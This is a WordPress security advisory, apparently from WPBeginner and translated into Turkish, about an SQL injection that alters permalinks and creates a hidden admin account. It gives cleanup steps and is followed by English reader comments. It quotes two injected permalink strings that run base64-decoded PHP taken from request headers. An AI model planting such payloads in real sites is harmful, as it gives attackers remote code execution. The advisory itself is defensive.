Birçok site, sitenize kodların enjekte edildiği yeni bir SQL saldırısından etkileniyor. Bu MySQL enjeksiyonu, kalıcı bağlantılarınızı etkisiz hale getirerek etkiler. Sonuç olarak, blog yazılarınızın URL’leri çalışmayacaktır. Bu saldırıda çok sayıda WordPress blogu hedef alındı, Andy Soward ‘a bu konuya dikkatimizi çektiği için teşekkür ederiz.
Bu saldırı nedeniyle kalıcı bağlantı yapınıza aşağıdaki kodlardan biri eklenmiştir:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Bu alıntılar sitenizdeki tüm kalıcı bağlantılara eklenir ve yalnızca manuel olarak kaldırılırsa değiştirilebilir.
Bunu düzeltmek için şu adrese gidin:
Ayarlar > Kalıcı Bağlantılar öğesine gidin ve yukarıdaki kodu kaldırıp varsayılan kodunuzu değiştirin.
Yapmanız gereken bir sonraki şey Kullanıcılar’a gitmektir. Birden fazla yönetici olduğunu göreceksiniz. Adlarının listelendiğini görmeyeceksiniz, ancak sayının arttığını göreceksiniz. Yapmanız gereken tüm kullanıcılara bakmak ve en son kayıt olan kullanıcıyı bulmak. Farenizi o kullanıcının üzerine getirin ve bağlantıyı alın. userid= kodunu bu sayıya 1 ekleyerek değiştirin. Yani görebildiğiniz son kullanıcı #2 kullanıcısıysa, ona 1 ekleyin ve 3 yapın. Gizli yöneticinin ilk adı olarak garip bir kod olduğunu göreceksiniz. Kodu silin ve onu abone yapın. Sonra geri dönün ve onu silin.
Bu sorunu çözecektir. Ayrıca PHPMyAdmin’inize giderek de onu silebilirsiniz. Çünkü kullanıcıyı orada göreceksiniz.
Bu haberi mümkün olan en kısa sürede duyurmak istedik, böylece kullanıcılarımız güncellenebilir. Lütfen blogunuza virüs bulaşıp bulaşmadığını kontrol ettiğinizden emin olun. WordPress’in yakında bir sürüm yayınlayacağını umuyoruz.
Ayrıca, WordPress Yönetici Alanınızın güvenliğini sağlamak için bu önlemlerden bazılarını uygulamadıysanız.
Syed Balkhi
Hey WPBeginner readers,
Did you know you can win exciting prizes by commenting on WPBeginner?
Every month, our top blog commenters will win HUGE rewards, including premium WordPress plugin licenses and cash prizes.
You can get more details about the contest from here.
Start sharing your thoughts below to stand a chance to win!
ahmed_alaaedin
The database of my website has been injected few days ago, adding some strange characters and words after each post or page URL. I couldn’t find anything strange in the settings: permalinks or in the users menu. What to do to fix this problem, please? My hosting company has a backup of the infected database as well!
a wordpress user
i was hit by this twice.
first time it was wassup plugin sql injection, this time im not sure. my hosting provider has blocked me.
once they restore my a/c i will remove wordpres.. I have had it!
Editorial Staff
Perhaps its not WordPress fault, maybe your hosting security is just not as good…
Yönetici
Joey
What did you figure out with this? I was just hit with same issue. All my WP sites on my account are suffering the same problem.
lerrkin
Hi.
Interesting url https://www.wpbeginner.com/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/ linked from here shows blank page.
Code contains this comment: ‘‘.
That’s WP Super Cache’s bug http://wordpress.org/support/topic/315446, and it seems present here… So update WP Super Cache, please. I hope read that tips soon
Editorial Staff
We really appreciate this comment, the issue was not with the WP Super Cache, we believe it was the plugin called WP External Link. We uninstalled and reinstalled WP-Super Cache twice, but then we compared the development server where everything worked fine. The difference was this plugin. When we removed that plugin it worked. You may now read that post.
Yönetici
lerrkin
Maybe that was WP External Link and Super Cache conflict…
I see my pasted WP-Super-Cache html comment above works as html comment and is invisible Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
So last Super Cache ver. promises to do not html validity check.
Oh, I’m reading!
Thanks a lot!
Roseli A. Bakar
Thanks for highlighting this